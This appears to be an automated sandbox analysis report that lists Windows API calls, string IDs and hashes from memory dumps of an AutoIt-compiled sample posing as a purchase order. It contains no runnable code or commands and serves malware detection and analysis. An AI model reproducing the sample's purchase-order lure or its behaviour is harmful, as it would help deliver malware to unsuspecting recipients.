                                                            • Source File: 00000000.00000002.2048696009.0000000003FA0000.00000040.00000020.00020000.00000000.sdmp, Offset: 03FA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_3fa0000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            APIs
                                                            • DeleteObject.GDI32(?), ref: 0045953B
                                                            • DeleteObject.GDI32(?), ref: 00459551
                                                            • DestroyWindow.USER32(?), ref: 00459563
                                                            • GetDesktopWindow.USER32 ref: 00459581
                                                            • GetWindowRect.USER32(00000000), ref: 00459588
                                                            • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                                                            • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                                                            • GetClientRect.USER32(00000000,?), ref: 004596F8
                                                            • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                                                            • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                                                            • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                                                            • GlobalLock.KERNEL32(00000000), ref: 0045978F
                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                                                            • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                                                            • CloseHandle.KERNEL32(00000000), ref: 004597AC
                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                                                            • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                                                            • GlobalFree.KERNEL32(00000000), ref: 004597E2
                                                            • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                                                            • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                                                            • ShowWindow.USER32(?,00000004), ref: 00459865
                                                            • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                                                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                                                            • GetStockObject.GDI32(00000011), ref: 004598CD
                                                            • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                                                            • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                                                            • DeleteDC.GDI32(00000000), ref: 004598F8
                                                            • _wcslen.LIBCMT ref: 00459916
                                                            • _wcscpy.LIBCMT ref: 0045993A
                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                                                            • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                                                            • GetDC.USER32(00000000), ref: 004599FC
                                                            • SelectObject.GDI32(00000000,?), ref: 00459A0C
                                                            • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                                                            • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                                                            • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                            • String ID: $AutoIt v3$DISPLAY$static
                                                            • API String ID: 4040870279-2373415609
                                                            APIs
                                                            • GetSysColor.USER32(00000012), ref: 0044181E
                                                            • SetTextColor.GDI32(?,?), ref: 00441826
                                                            • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                                                            • GetSysColor.USER32(0000000F), ref: 00441849
                                                            • SetBkColor.GDI32(?,?), ref: 00441864
                                                            • SelectObject.GDI32(?,?), ref: 00441874
                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                                                            • GetSysColor.USER32(00000010), ref: 004418B2
                                                            • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                                                            • FrameRect.USER32(?,?,00000000), ref: 004418CA
                                                            • DeleteObject.GDI32(?), ref: 004418D5
                                                            • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                                                            • FillRect.USER32(?,?,?), ref: 00441970
                                                              • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                                                              • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                              • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                              • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                                              • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                                                              • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                              • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                                              • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                                                              • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                                              • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                              • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                              • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                              • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                                            • String ID:
                                                            • API String ID: 69173610-0
                                                            • Opcode ID: 5c79b92763c8014ff546f30321fedd54336918ef6aa641c4bc50dafe0e0cc36e
                                                            • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                                                            • Opcode Fuzzy Hash: 5c79b92763c8014ff546f30321fedd54336918ef6aa641c4bc50dafe0e0cc36e
                                                            • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                                                            APIs
                                                            • DestroyWindow.USER32(?), ref: 004590F2
                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                                                            • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                                                            • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                                                            • GetClientRect.USER32(00000000,?), ref: 0045924E
                                                            • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                                                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                                                            • GetStockObject.GDI32(00000011), ref: 004592AC
                                                            • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                                                            • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                                                            • DeleteDC.GDI32(00000000), ref: 004592D6
                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                                                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                                                            • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                                                            • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                                                            • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                                                            • GetStockObject.GDI32(00000011), ref: 004593D3
                                                            • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                                                            • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                            • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                            • API String ID: 2910397461-517079104
                                                            • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                            • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                                                            • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                            • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: __wcsnicmp
                                                            • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                                            • API String ID: 1038674560-3360698832
                                                            • Opcode ID: 5ac0d074d0f2c4f3e64cea3940d5eb1af2dab97db6e12398ad8f12eee9a98506
                                                            • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                                                            • Opcode Fuzzy Hash: 5ac0d074d0f2c4f3e64cea3940d5eb1af2dab97db6e12398ad8f12eee9a98506
                                                            • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
                                                            APIs
                                                            • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                                                            • SetCursor.USER32(00000000), ref: 0043075B
                                                            • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                                                            • SetCursor.USER32(00000000), ref: 00430773
                                                            • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                                                            • SetCursor.USER32(00000000), ref: 0043078B
                                                            • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                                                            • SetCursor.USER32(00000000), ref: 004307A3
                                                            • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                                                            • SetCursor.USER32(00000000), ref: 004307BB
                                                            • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                                                            • SetCursor.USER32(00000000), ref: 004307D3
                                                            • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                                                            • SetCursor.USER32(00000000), ref: 004307EB
                                                            • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                                                            • SetCursor.USER32(00000000), ref: 00430803
                                                            • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                                                            • SetCursor.USER32(00000000), ref: 0043081B
                                                            • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                                                            • SetCursor.USER32(00000000), ref: 00430833
                                                            • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                                                            • SetCursor.USER32(00000000), ref: 0043084B
                                                            • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                                                            • SetCursor.USER32(00000000), ref: 00430863
                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                                                            • SetCursor.USER32(00000000), ref: 0043087B
                                                            • SetCursor.USER32(00000000), ref: 00430887
                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                                                            • SetCursor.USER32(00000000), ref: 0043089F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Cursor$Load
                                                            • String ID:
                                                            • API String ID: 1675784387-0
                                                            • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                            • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                                                            • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                            • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                                                            APIs
                                                            • GetSysColor.USER32(0000000E), ref: 00430913
                                                            • SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                            • GetSysColor.USER32(00000012), ref: 00430933
                                                            • SetTextColor.GDI32(?,?), ref: 0043093B
                                                            • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                            • GetSysColor.USER32(0000000F), ref: 00430959
                                                            • CreateSolidBrush.GDI32(?), ref: 00430962
                                                            • GetSysColor.USER32(00000011), ref: 00430979
                                                            • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                            • SelectObject.GDI32(?,00000000), ref: 0043099C
                                                            • SetBkColor.GDI32(?,?), ref: 004309A6
                                                            • SelectObject.GDI32(?,?), ref: 004309B4
                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                            • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                            • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                                                            • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                                                            • DrawFocusRect.USER32(?,?), ref: 00430A91
                                                            • GetSysColor.USER32(00000011), ref: 00430A9F
                                                            • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                                                            • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                                                            • SelectObject.GDI32(?,?), ref: 00430AD0
                                                            • DeleteObject.GDI32(00000105), ref: 00430ADC
                                                            • SelectObject.GDI32(?,?), ref: 00430AE3
                                                            • DeleteObject.GDI32(?), ref: 00430AE9
                                                            • SetTextColor.GDI32(?,?), ref: 00430AF0
                                                            • SetBkColor.GDI32(?,?), ref: 00430AFB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                            • String ID:
                                                            • API String ID: 1582027408-0
                                                            • Opcode ID: a7cf9b009f0fc1427fa9122de835988eeaa5bfd4ae15f23b8ce418ed36741d1b
                                                            • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                                                            • Opcode Fuzzy Hash: a7cf9b009f0fc1427fa9122de835988eeaa5bfd4ae15f23b8ce418ed36741d1b
                                                            • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                                                            APIs
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                                                            • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                                                            • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: CloseConnectCreateRegistry
                                                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                            • API String ID: 3217815495-966354055
                                                            • Opcode ID: b703d7911cbb2b9a1b8a55fbd60617da6949817c0165a24d00aa1ab6907a89d6
                                                            • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                                                            • Opcode Fuzzy Hash: b703d7911cbb2b9a1b8a55fbd60617da6949817c0165a24d00aa1ab6907a89d6
                                                            • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                                                            APIs
                                                            • GetCursorPos.USER32(?), ref: 004566AE
                                                            • GetDesktopWindow.USER32 ref: 004566C3
                                                            • GetWindowRect.USER32(00000000), ref: 004566CA
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                                                            • DestroyWindow.USER32(?), ref: 00456746
                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                                                            • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                                                            • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                                                            • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                                                            • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                                                            • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                                                            • IsWindowVisible.USER32(?), ref: 0045682C
                                                            • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                                                            • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                                                            • GetWindowRect.USER32(?,?), ref: 00456873
                                                            • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                                                            • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                                                            • CopyRect.USER32(?,?), ref: 004568BE
                                                            • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                            • String ID: ($,$tooltips_class32
                                                            • API String ID: 225202481-3320066284
                                                            • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                            • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                                                            • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                            • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                                                            APIs
                                                            • OpenClipboard.USER32(?), ref: 0046DCE7
                                                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                            • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                            • CloseClipboard.USER32 ref: 0046DD0D
                                                            • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                            • CloseClipboard.USER32 ref: 0046DD41
                                                            • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                            • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                            • CloseClipboard.USER32 ref: 0046DD99
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                            • String ID:
                                                            • API String ID: 15083398-0
APIs
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• GetWindowRect.USER32(?,?), ref: 00471CF7
• GetClientRect.USER32(?,?), ref: 00471D05
• GetSystemMetrics.USER32(00000007), ref: 00471D0D
• GetSystemMetrics.USER32(00000008), ref: 00471D20
• GetSystemMetrics.USER32(00000004), ref: 00471D42
• SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
• GetSystemMetrics.USER32(00000007), ref: 00471D79
• SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
• GetSystemMetrics.USER32(00000008), ref: 00471DAB
• GetSystemMetrics.USER32(00000004), ref: 00471DCF
• SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
• AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
• CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
• SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
• GetClientRect.USER32(?,?), ref: 00471E8A
• GetStockObject.GDI32(00000011), ref: 00471EA6
• SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
• SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
Similarity
• API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
• String ID: @$AutoIt v3 GUI
• API String ID: 867697134-3359773793
Similarity
• API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
• String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
• API String ID: 1503153545-1459072770
Similarity
• API ID: __wcsicoll$__wcsnicmp
• String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
• API String ID: 790654849-32604322
APIs
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
Similarity
• API ID: Window
• String ID: 0
• API String ID: 2353593579-4108050209
APIs
• GetSysColor.USER32(0000000F), ref: 0044A05E
• GetClientRect.USER32(?,?), ref: 0044A0D1
• SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
• GetWindowDC.USER32(?), ref: 0044A0F6
• GetPixel.GDI32(00000000,?,?), ref: 0044A108
• ReleaseDC.USER32(?,?), ref: 0044A11B
• GetSysColor.USER32(0000000F), ref: 0044A131
• GetWindowLongW.USER32(?,000000F0), ref: 0044A140
• GetSysColor.USER32(0000000F), ref: 0044A14F
• GetSysColor.USER32(00000005), ref: 0044A15B
• GetWindowDC.USER32(?), ref: 0044A1BE
• GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
• GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
• GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
• GetPixel.GDI32(00000000,?,?), ref: 0044A21D
• ReleaseDC.USER32(?,00000000), ref: 0044A229
• SetBkColor.GDI32(?,00000000), ref: 0044A24C
• GetSysColor.USER32(00000008), ref: 0044A265
• SetTextColor.GDI32(?,00000000), ref: 0044A270
• SetBkMode.GDI32(?,00000001), ref: 0044A282
• GetStockObject.GDI32(00000005), ref: 0044A28A
Similarity
• API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
• String ID:
• API String ID: 1744303182-0
APIs
• GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
• __mtterm.LIBCMT ref: 00417C34
  • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
  • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
  • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
  • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
• GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
• GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
• GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
• GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
• TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
• TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
• __init_pointers.LIBCMT ref: 00417CE6
• __calloc_crt.LIBCMT ref: 00417D54
• GetCurrentThreadId.KERNEL32 ref: 00417D80
Similarity
• API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
• String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
• API String ID: 4163708885-3819984048
Similarity
• API ID:
• String ID: >>>AUTOIT SCRIPT<<<$\
• API String ID: 0-1896584978
                                                            Similarity
                                                            • API ID: __wcsicoll$IconLoad
                                                            • String ID: blank$info$question$stop$warning
                                                            • API String ID: 2485277191-404129466
                                                            • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                            • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                                                            • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                            • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                                                            APIs
                                                            • LoadIconW.USER32(?,00000063), ref: 0045464C
                                                            • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                                                            • SetWindowTextW.USER32(?,?), ref: 00454678
                                                            • GetDlgItem.USER32(?,000003EA), ref: 00454690
                                                            • SetWindowTextW.USER32(00000000,?), ref: 00454697
                                                            • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                                                            • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                                                            • GetWindowRect.USER32(?,?), ref: 004546F5
                                                            • SetWindowTextW.USER32(?,?), ref: 00454765
                                                            • GetDesktopWindow.USER32 ref: 0045476F
                                                            • GetWindowRect.USER32(00000000), ref: 00454776
                                                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                                                            • GetClientRect.USER32(?,?), ref: 004547D2
                                                            • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                                                            • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                            • String ID:
                                                            • API String ID: 3869813825-0
